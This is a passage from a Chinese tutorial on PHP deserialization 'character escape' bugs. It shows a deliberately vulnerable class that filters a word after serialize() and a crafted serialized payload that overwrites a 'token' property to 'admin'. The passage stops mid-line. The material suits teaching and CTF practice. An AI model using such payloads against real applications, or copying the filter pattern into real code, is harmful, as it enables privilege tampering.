字符逃逸的本质是替换后字符长度发生了改变。
两种情况:①替换后字符长度增加②替换后字符长度减少
漏洞利用:间接修改属性的值
①替换后字符串长度增加
示例代码
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct(){
$this->from = 'fuck';
$this->msg = 1;
$this->to = 1;
}
}
function filter($a){
return str_replace('fuck','admin',$a);
}
$u=serialize(new message());
$us=filter($u);
echo $u;
echo $us;
#$a='O:7:"message":4:{s:4:"from";s:265:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:3:"msg";i:1;s:2:"to";i:1;s:5:"token";s:5:"admin";}";s:3:"msg";i:1;s:2:"to";i:1;s:5:"token";s:4:"user";}';
var_dump(unserialize($a));
能利用字符逃逸漏洞干什么?可用来间接修改其他属性的属性值。
替换前:O:7:"message":4:{
s:4:"from";s:4